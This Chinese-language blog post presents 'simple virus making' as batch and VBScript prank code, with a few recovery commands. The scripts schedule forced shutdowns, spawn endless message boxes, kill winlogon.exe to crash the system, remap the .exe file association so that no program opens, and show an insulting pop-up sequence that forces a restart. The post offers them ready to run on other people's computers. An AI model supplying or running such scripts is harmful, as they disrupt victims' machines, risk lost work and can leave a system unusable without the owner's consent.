简单的病毒制作及破解方法

一:简单的病毒制作
一下的命令,可以在cmd中执行。 也可以使用文档加代码来执行
.bat 文档
关机命令

shutdown -s -t 331

更多的命令的参数
恢复命令:

shutdown -a

.vbs文档

do
msgbox "加上你要加的文字"
loop
do loop(简单的死循环)

用任务管理器可以关闭

.bat文档
命令使电脑蓝屏并关机。

ntsd -c q -pn winlogon.exe

.bat 文档

assoc.exe=txtfile

所有的应用程序.exe的都打不开来
恢复操作
assoc.exe=exefile(部分电脑不支持的)

新建Te.vbs文件,加入如下的代码整人代码如下,点击打开即可运行

msgbox("你还是打开手机的摄像头,看看你什么颜值?")
msgbox("你终于认识到你是猪了")

b=msgbox("你是不是猪狗不如呢?")
if b=vbYes then
    msgbox("就知道你是这样的")
else 
    msgbox("你还不好意思承认")
    c=msgbox("你是不是想关机呢?" ,vbYesNo)
    if c=vbNo then
        set ws=createobject("wscript.shell")
        ws.run"cmd.exe /c shutdown -r -t 60"
    else 
        msgbox("就不给你关机,哈哈")
    end if

end if

新建test .vbs文档加入代码 ,点击打开即可运行

dim score
score=72
if score>=90 then
    msgbox("秀秀")
elseif score>=80 and score<90 then
    msgbox("良")
elseif score>=60 and score<80 then
    msgbox("及格")
else
    msgbox("不及格")
end if

你可能感兴趣的:(简单的病毒制作及破解方法)